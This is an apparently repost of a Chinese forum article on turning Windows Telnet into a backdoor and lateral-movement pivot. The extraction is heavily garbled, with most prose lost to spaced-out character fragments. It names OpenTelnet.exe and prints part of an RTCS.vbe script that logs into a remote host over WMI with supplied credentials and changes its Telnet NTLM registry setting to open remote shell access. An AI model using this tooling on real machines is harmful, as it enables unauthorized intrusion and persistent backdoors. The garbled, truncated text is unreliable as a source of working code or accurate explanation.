[20898] 2017-09-13_巧用Telnet做后门和跳板

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2017-09-13_巧用Telnet做后门和跳板 T e l n e t L e m o n S e c   2 0 1 7 - 0 9 - 1 3                 T e l n e t / ( T C P / I P ) ( I n t e r n e t ) 仿 A R P A N E T I n t e r n e t T e l n e t / T e l n e t ( ) T e l n e t                     使 便 使 使 T e l n e t 使 仿 仿                       使 T e l n e t T e l n e t ; I p ;                       T e l n e t 4                       ( 1 ) T C P I P ;                       ( 2 ) N V T ( N e t   V i r t u a l   T e r m i n a l ) I P ;                       ( 3 ) N V T ;                       ( 4 ) T C P                       W i n d o w s   2 0 0 0 W i n d o w s T e l n e t T e l n e t . e x e ( C l i e n t ) t l n t s v r . e x e ( s e r v e r ) T e l n e t t l n t a d m n . e x e W i n d o w s   2 0 0 0     T e l n e t   t e l n e t                     1 T e l n e t     D o s s e r v i c e s . m s c T e l n e t 1 T e l n e t . 2 使 使 t e l n e t     D o s 使 t e l n e t   2 1 8 . * . * . * t e l n e t N T L M 2
&     ( 1 ) N T L M 2 0 使   N T L M   ; 1 N T L M 使 ; 2 使   N T L M       ( 2 ) T e l n e t     t e l n e t   2 3 T e l n e t     ( 3 ) S M B L A N   M a n a g e r   C h a l l e n g e / R e s p o n s e L M W i n d o w s N T / N T L M N T L M v 2 K e r b e r o s T e l n e t W i n d o w s N T L M     ( 4 ) N T L M 1 6   c h a l l e n g e ( ) ; c h a l l e n g e   r e s p o n s e ( ) ; c h a l l e n g e   r e s p o n s e 西 ;   S A M 使 c h a l l e n g e ;   c h a l l e n g e 3 使 使 T e l n e t     t l n t a d m n 3 3 / &     ( 1 ) T e l n e t 0 退 1 2 4 5     ( 2 ) W i n d o w s   X p 使 T e l n e t t l n t a d m n   / ?       4 N T L M     4 7 y 0 y 0 退
&     ( 1 ) 便 ; 使 o p e n t e l n e t . e x e ( I P C ) 使 R T C S ( I P C )     ( 2 ) O p e n T e l n e t   使 O p e n T e l n e t . e x e   s e r v e r   u s e r n a m e   p a s s w o r d   N T L M A u t h o r   t e l n e t p o r t N T L M A u t h o r ( ) 0 1     ( 3 ) R T C S . v b e   使 c s c r i p t   R T C S . v b e   t a r g e t I P   u s e r n a m e   p a s s w o r d   N T L M A u t h o r   t e l n e t p o r t R T C S . v b e     o n   e r r o r   r e s u m e   n e x t     s e t   o u t s t r e e m = w s c r i p t . s t d o u t     i f   ( l c a s e ( r i g h t ( w s c r i p t . f u l l n a m e , 1 1 ) ) = " w s c r i p t . e x e " )   t h e n     s e t   o b j S h e l l = w s c r i p t . c r e a t e O b j e c t ( " w s c r i p t . s h e l l " )     o b j S h e l l . R u n ( " c m d . e x e   / k   c s c r i p t   / / n o l o g o   " & c h r ( 3 4 ) & w s c r i p t . s c r i p t f u l l n a m e & c h r ( 3 4 ) )     w s c r i p t . q u i t     e n d   i f     i f   w s c r i p t . a r g u m e n t s . c o u n t < 5   t h e n     u s a g e ( )     w s c r i p t . e c h o   " N o t   e n o u g h   p a r a m e t e r s . "     w s c r i p t . q u i t     e n d   i f     i p a d d r e s s = w s c r i p t . a r g u m e n t s ( 0 )     u s e r n a m e = w s c r i p t . a r g u m e n t s ( 1 )     p a s s w o r d = w s c r i p t . a r g u m e n t s ( 2 )     n t l m = w s c r i p t . a r g u m e n t s ( 3 )     p o r t = w s c r i p t . a r g u m e n t s ( 4 )     i f   n o t   i s n u m e r i c ( n t l m )   o r   n t l m < 0   o r   n t l m > 2   t h e n     u s a g e ( )     w s c r i p t . e c h o   T h e   v a l u e   o f   N T M L   i s   w r o n g .     w s c r i p t . q u i t     e n d   i f     i f   n o t   i s n u m e r i c ( p o r t )   t h e n     u s a g e ( )     w s c r i p t . e c h o   T h e   v a l u e   o f   p o r t   i s   w r o n g .     w s c r i p t . q u i t     e n d   i f     u s a g e ( )     o u t s t r e e m . w r i t e   C o n n e t i n g   & i p a d d r e s s & .     s e t   o b j l o c a t o r = c r e a t e o b j e c t ( w b e m s c r i p t i n g . s w b e m l o c a t o r )     s e t   o b j s w b e m s e r v i c e s = o b j l o c a t o r . c o n n e c t s e r v e r ( i p a d d r e s s , r o o t / d e f a u l t , u s e r n a m e , p a s s w o r d )     s h o w e r r o r ( e r r . n u m b e r )
    o u t s t r e e m . w r i t e   S e t t i n g   N T L M = & n t l m & .     s e t   o b j i n s t a n c e = o b j s w b e m s e r v i c e s . g e t ( s t d r e g p r o v )     s e t   o b j m e t h o d = o b j i n s t a n c e . m e t h o d s _ ( S e t D W O R D v a l u e )     s e t   o b j i n p a r a m = o b j m e t h o d . i n p a r a m e t e r s . s p a w n i n s t a n c e _ ( )     o b j i n p a r a m . h d e f k e y = & h 8 0 0 0 0 0 0 2     o b j i n p a r a m . s s u b k e y n a m e = S O F T W A R E M i c r o s o f t T e l n e t S e r v e r 1 . 0     ( 4 ) T e l n e t 使 5 T e l n e t     使 t e l n e t   i p T e l n e t 5 I P T e l n e t                     &     ( 1 ) t e l n e t t e l n e t D O S 6 ( 2 ) 使 t e l n e t I P T e l n e t T e l n e t T e l n e t N T e l n e t     ( 3 ) 使 T e l n e t t e l n e t 2 3 T e l n e t     ( 4 ) t e l n e t         T e l n e t 使 T e l n e t
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则